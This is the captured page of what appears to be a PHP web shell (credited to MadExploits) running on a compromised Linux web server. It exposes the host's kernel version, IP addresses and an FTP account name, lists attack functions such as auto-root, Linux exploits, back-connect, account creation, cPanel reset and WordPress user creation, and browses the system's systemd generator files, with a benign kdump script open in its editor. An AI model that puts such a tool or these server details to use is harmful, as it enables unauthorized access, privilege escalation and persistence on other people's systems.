Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
system-generators /
[ HOME SHELL ]
Name
Size
Permission
Action
kdump-dep-generator.sh
537
B
-rwxr-xr-x
lvm2-activation-generator
131.17
KB
-r-xr-xr-x
selinux-autorelabel-generator....
743
B
-rwxr-xr-x
systemd-cryptsetup-generator
32.85
KB
-rwxr-xr-x
systemd-debug-generator
16.43
KB
-rwxr-xr-x
systemd-fstab-generator
45.09
KB
-rwxr-xr-x
systemd-getty-generator
16.76
KB
-rwxr-xr-x
systemd-gpt-auto-generator
28.85
KB
-rwxr-xr-x
systemd-hibernate-resume-gener...
12.45
KB
-rwxr-xr-x
systemd-rc-local-generator
12.29
KB
-rwxr-xr-x
systemd-system-update-generato...
12.33
KB
-rwxr-xr-x
systemd-sysv-generator
32.88
KB
-rwxr-xr-x
systemd-veritysetup-generator
16.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kdump-dep-generator.sh
#!/bin/sh # More details about systemd generator: # http://www.freedesktop.org/wiki/Software/systemd/Generators/ . /usr/lib/kdump/kdump-lib.sh . /usr/lib/kdump/kdump-logger.sh # If invokded with no arguments for testing purpose, output to /tmp to # avoid overriding the existing. dest_dir="/tmp" if [ -n "$1" ]; then dest_dir=$1 fi systemd_dir=/usr/lib/systemd/system kdump_wants=$dest_dir/kdump.service.wants if is_ssh_dump_target; then mkdir -p $kdump_wants ln -sf $systemd_dir/network-online.target $kdump_wants/ fi
Close